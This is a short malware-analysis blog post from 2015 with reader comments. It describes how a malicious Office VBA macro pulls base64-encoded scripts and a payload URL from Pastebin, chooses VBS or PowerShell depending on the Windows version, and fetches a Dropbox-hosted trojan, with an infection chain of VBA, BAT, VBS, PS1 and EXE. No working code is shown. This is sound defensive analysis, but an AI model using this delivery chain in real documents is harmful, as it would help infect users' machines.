Didier Stevens

Wednesday 8 April 2015

Quickpost: Maldocs: VBA And Pastebin

Filed under: Malware — Didier Stevens @ 20:24

Since a day or two I’m seeing yet another trick used by malware authors in their VBA macros.

The sample I’m looking at is 26B857A0A57B89166584CBB7167CAA19.

The VBA macro downloads base64 encoded scripts from Pastebin:

20150408-220943

20150408-221046

The scripts are delimited by HTML-like tags like <text10>. Tags that start with stext are scripts for Windows XP systems, and tags that start with text are for Windows Vista and later. This difference is for Powershell: on XP, VBS scripts are executed, and on more recent systems, Powershell scripts are executed.

The URL of the payload comes from another Pastebin entry:

20150408-221533

Correct: that trojan is hosted on Dropbox.


Quickpost info


4 Comments »

  1. Saw that yesterday myself. Here is a report for such a sample: https://www.hybrid-analysis.com/sample/f42608e8d6c614a85c14f423a9acbd902d4d7b54b3c93decf48adea3f1bdf63c?environmentId=2

    Comment by Anonymous — Thursday 9 April 2015 @ 7:22

  2. .BAT==>>.VBS==>>.PS1

    Comment by Yogesh — Thursday 9 April 2015 @ 7:30

  3. To be precise, it is VBA -> BAT -> VBS -> PS1 -> EXE on Windows Vista and later.
    On Windows XP, it is VBA -> BAT -> (VBS; EXE)

    Comment by Didier Stevens — Thursday 9 April 2015 @ 13:20

  4. […] Kaufprodukte, sind dagegen sicher. Der Trick: Im Office Dokument (Text, Tabelle, Präsentation) steckt nur ein klitzekleiner unauffälliger Downloader als VBA Makro. Der holt sich den für die Infektion notwendigen Code von Pastebin, der wiederum die […]

    Pingback by Neue Gefahr durch MS-Office Trojaner | pc-flüsterer bremen — Saturday 11 April 2015 @ 18:26


RSS feed for comments on this post. TrackBack URI

Leave a Reply (comments are moderated)

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Blog at WordPress.com.

%d bloggers like this: